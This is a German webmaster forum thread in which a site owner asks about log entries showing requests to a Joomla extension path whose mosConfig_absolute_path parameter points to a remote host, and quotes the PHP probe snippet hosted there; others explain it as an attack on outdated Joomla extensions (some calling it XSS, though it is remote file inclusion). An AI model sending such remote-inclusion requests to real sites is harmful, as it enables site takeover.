Raptor
Themenersteller
IT-Student
Content Gott (1013 Beiträge)
Hack-Zugriff?
Salut,
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen
[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
der_booker
Foren Moderator
selbständig
(2762 Beiträge)
Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.
Heiko Jendreck
personal helpdesk
http://www.phw-jendreck.de
http://www.seo-labor.com
hansen
Foren Moderator
Content Gott (1886 Beiträge)
Raptor schrieb:
Salut,
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Hallo Flo,
der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?
hansen
Nepal Rundreisen
Raptor
IT-Student
Content Gott (1013 Beiträge)
der_booker schrieb:
Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.
Ich denke eher nicht, dass es damit einen Zusammenhang gibt. Warum sollte durch diesen Test eine solche Seite aufgerufen werden?
Es sieht mir mehr nach versuchtem XSS aus.
Unter der angegebenen Seite (ujcar.deva.rdsnet.ro/images/id1???) lässt sich folgenden Inhalt sehen:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
der_booker schrieb:
der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?
Ich weiss jetzt nicht worauf du hinaus willst. Ich denke nicht, dass es was mit einer Suche zu tun hat.
Die Log-Einträge sehen etwa so aus:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
/webscripting/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1?...
/webscripting/target-blank-in-xhtml-1-1/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar...
kein Referrer und mit Agent "Mozilla/5.0".
Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen
[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
romacron
JDev Xer
Content Gott (1224 Beiträge)
XSS , denke ich auch
Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.
Das zweite sieht nach einer Suchanfrage aus
seitenreportInhaber
TYPO3 Senior Developer
Content Gott (1772 Beiträge)
Raptor schrieb:
ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus..
Die mosConfig Zugriffe sind immer Angriffe auf vermeintliche Joomla Systeme (und oft erfolgreich).
Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).
Wenn kein Joomla verwendet wird, sind die Angriffe mehr oder weniger harmlos.
Gruß,
Matthias
SEO Analyse und Website-Check mit Seitenreport
Raptor
IT-Student
Content Gott (1013 Beiträge)
seitenreport schrieb:
Die mosConfig Zugriffe auf Joomla sind immer Angriffe (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).
Wie kann ein CMS nur so unsicher sein...
Wobei, ArtRef ist doch eine Erweiterung?
seitenreport schrieb:
Welche Joomla Version verwendest Du?
Wie gesagt, ich benutze Joomla gar nicht. (Ich benutze überhaupt kein CMS.)
Irgendeine Folge (ausser 404 Not Found) hatten die Zugriffe deshalb auch nicht.
Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen
[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
romacron
JDev Xer
Content Gott (1224 Beiträge)
Ja, die Art-dings-bums ist ne Erweiterungs-Komponente. Wenn man alle server und php einstellungen richtig macht, kann da nichts per xss gemacht werden.
Das was am unsichersten ist, sind die Erweiterungen. Da werden kaum varieablen abgeklopft.
Das Seitenreport Forum hat aktuell 5274 Themen und 36108 Beiträge.
Insgesamt sind 48356 Mitglieder registriert.
Beitrag erstellen
EinloggenKostenlos registrieren